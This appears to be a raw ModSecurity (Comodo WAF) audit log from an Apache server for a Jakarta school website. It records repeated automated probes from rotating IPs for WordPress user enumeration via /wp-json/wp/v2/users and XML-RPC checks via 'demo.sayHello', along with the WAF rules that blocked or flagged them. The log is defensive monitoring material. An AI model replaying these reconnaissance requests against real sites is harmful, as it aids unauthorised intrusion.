"/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747426186985820 4749 (- - -) Stopwatch2: 1747426186985820 4749; combined=3712, p1=473, p2=3020, p3=24, p4=22, p5=100, sr=67, sw=73, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1beef61c-Z-- --6fbd6b2f-A-- [17/May/2025:03:09:50 +0700] aCebjse47ocjCGWTS4Y_LAAAAEk 103.236.140.4 54752 103.236.140.4 8181 --6fbd6b2f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.95.206 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.95.206 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --6fbd6b2f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6fbd6b2f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747426190729317 3265 (- - -) Stopwatch2: 1747426190729317 3265; combined=1349, p1=461, p2=856, p3=0, p4=0, p5=32, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6fbd6b2f-Z-- --7d6ffc01-A-- [17/May/2025:03:09:56 +0700] aCeblMe47ocjCGWTS4Y_LgAAAFE 103.236.140.4 54756 103.236.140.4 8181 --7d6ffc01-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.95.206 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.95.206 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --7d6ffc01-C-- demo.sayHello --7d6ffc01-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --7d6ffc01-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747426196288555 5933 (- - -) Stopwatch2: 1747426196288555 5933; combined=4344, p1=560, p2=3516, p3=33, p4=38, p5=117, sr=78, sw=80, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7d6ffc01-Z-- --10618957-A-- [17/May/2025:03:09:56 +0700] aCeblMe47ocjCGWTS4Y_LwAAAEM 103.236.140.4 54758 103.236.140.4 8181 --10618957-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.46.140 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.46.140 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --10618957-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --10618957-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747426196783350 1962 (- - -) Stopwatch2: 1747426196783350 1962; combined=961, p1=325, p2=610, p3=0, p4=0, p5=26, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --10618957-Z-- --6acd510e-A-- [17/May/2025:03:10:03 +0700] aCebm9e6THFz1hsaJaLZSQAAABI 103.236.140.4 54764 103.236.140.4 8181 --6acd510e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.46.140 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.46.140 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --6acd510e-C-- demo.sayHello --6acd510e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --6acd510e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747426203857122 6069 (- - -) Stopwatch2: 1747426203857122 6069; combined=4383, p1=577, p2=3568, p3=33, p4=37, p5=98, sr=75, sw=70, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6acd510e-Z-- --860ed42d-A-- [17/May/2025:03:10:15 +0700] aCebp8e47ocjCGWTS4Y_MgAAAFY 103.236.140.4 54768 103.236.140.4 8181 --860ed42d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.91.225 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.91.225 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --860ed42d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --860ed42d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747426215961771 3450 (- - -) Stopwatch2: 1747426215961771 3450; combined=1429, p1=493, p2=904, p3=0, p4=0, p5=32, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --860ed42d-Z-- --f282da14-A-- [17/May/2025:03:10:17 +0700] aCebqce47ocjCGWTS4Y_MwAAAFc 103.236.140.4 54770 103.236.140.4 8181 --f282da14-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.107.197 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.107.197 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f282da14-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f282da14-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747426217929314 2136 (- - -) Stopwatch2: 1747426217929314 2136; combined=979, p1=337, p2=615, p3=0, p4=0, p5=27, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f282da14-Z-- --fb04914f-A-- [17/May/2025:03:10:20 +0700] aCebrNe6THFz1hsaJaLZSwAAABM 103.236.140.4 54776 103.236.140.4 8181 --fb04914f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.91.225 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.91.225 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --fb04914f-C-- demo.sayHello --fb04914f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --fb04914f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747426220122138 4811 (- - -) Stopwatch2: 1747426220122138 4811; combined=3670, p1=438, p2=3020, p3=21, p4=23, p5=96, sr=68, sw=72, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fb04914f-Z-- --dabdee5c-A-- [17/May/2025:03:10:23 +0700] aCebr8e47ocjCGWTS4Y_NQAAAEI 103.236.140.4 54778 103.236.140.4 8181 --dabdee5c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.107.197 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.107.197 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --dabdee5c-C-- demo.sayHello --dabdee5c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --dabdee5c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747426223131699 4585 (- - -) Stopwatch2: 1747426223131699 4585; combined=3591, p1=449, p2=2948, p3=23, p4=26, p5=85, sr=74, sw=60, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dabdee5c-Z-- --d7e9c371-A-- [17/May/2025:03:10:25 +0700] aCebsce47ocjCGWTS4Y_NwAAAEs 103.236.140.4 54782 103.236.140.4 8181 --d7e9c371-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.83.183 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.83.183 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d7e9c371-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d7e9c371-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747426225434610 2772 (- - -) Stopwatch2: 1747426225434610 2772; combined=1259, p1=430, p2=799, p3=0, p4=0, p5=30, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d7e9c371-Z-- --b3463618-A-- [17/May/2025:03:10:28 +0700] aCebtMe47ocjCGWTS4Y_OQAAAEo 103.236.140.4 54786 103.236.140.4 8181 --b3463618-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.74.171 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.74.171 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b3463618-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b3463618-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747426228858795 2539 (- - -) Stopwatch2: 1747426228858795 2539; combined=1223, p1=425, p2=767, p3=0, p4=0, p5=30, sr=75, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b3463618-Z-- --1e73f378-A-- [17/May/2025:03:10:32 +0700] aCebuMe47ocjCGWTS4Y_OwAAAEw 103.236.140.4 54792 103.236.140.4 8181 --1e73f378-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.83.183 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.83.183 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --1e73f378-C-- demo.sayHello --1e73f378-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --1e73f378-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747426232452235 4604 (- - -) Stopwatch2: 1747426232452235 4604; combined=3624, p1=414, p2=3016, p3=21, p4=23, p5=88, sr=66, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1e73f378-Z-- --c47f5554-A-- [17/May/2025:03:10:34 +0700] aCebuse47ocjCGWTS4Y_PAAAAEY 103.236.140.4 54794 103.236.140.4 8181 --c47f5554-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.74.171 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.74.171 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --c47f5554-C-- demo.sayHello --c47f5554-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --c47f5554-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747426234746709 5821 (- - -) Stopwatch2: 1747426234746709 5821; combined=4110, p1=583, p2=3309, p3=30, p4=32, p5=93, sr=82, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c47f5554-Z-- --03f00f4e-A-- [17/May/2025:03:10:36 +0700] aCebvNe6THFz1hsaJaLZTgAAAAA 103.236.140.4 54800 103.236.140.4 8181 --03f00f4e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.194.233 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.194.233 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --03f00f4e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --03f00f4e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747426236279494 2651 (- - -) Stopwatch2: 1747426236279494 2651; combined=1192, p1=412, p2=747, p3=0, p4=0, p5=32, sr=78, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --03f00f4e-Z-- --52d47c08-A-- [17/May/2025:03:10:42 +0700] aCebwse47ocjCGWTS4Y_PgAAAE8 103.236.140.4 54804 103.236.140.4 8181 --52d47c08-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.194.233 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.194.233 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --52d47c08-C-- demo.sayHello --52d47c08-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --52d47c08-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747426242835515 4558 (- - -) Stopwatch2: 1747426242835515 4558; combined=3536, p1=454, p2=2884, p3=23, p4=25, p5=89, sr=69, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --52d47c08-Z-- --fc93df7d-A-- [17/May/2025:03:11:53 +0700] aCecCdhEtho3ciA0weheeAAAAIg 103.236.140.4 54814 103.236.140.4 8181 --fc93df7d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.179.33 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.179.33 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --fc93df7d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fc93df7d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747426313362571 15293 (- - -) Stopwatch2: 1747426313362571 15293; combined=26388, p1=421, p2=860, p3=0, p4=0, p5=12568, sr=72, sw=0, l=0, gc=12539 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fc93df7d-Z-- --77fa3339-A-- [17/May/2025:03:12:00 +0700] aCecENe6THFz1hsaJaLZTwAAABg 103.236.140.4 54822 103.236.140.4 8181 --77fa3339-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.179.33 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.179.33 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --77fa3339-C-- demo.sayHello --77fa3339-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --77fa3339-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747426320734254 4646 (- - -) Stopwatch2: 1747426320734254 4646; combined=3589, p1=436, p2=2954, p3=22, p4=26, p5=89, sr=68, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --77fa3339-Z-- --6404904c-A-- [17/May/2025:03:13:07 +0700] aCecU9hEtho3ciA0weheewAAAJU 103.236.140.4 54832 103.236.140.4 8181 --6404904c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.166.212 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.166.212 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like 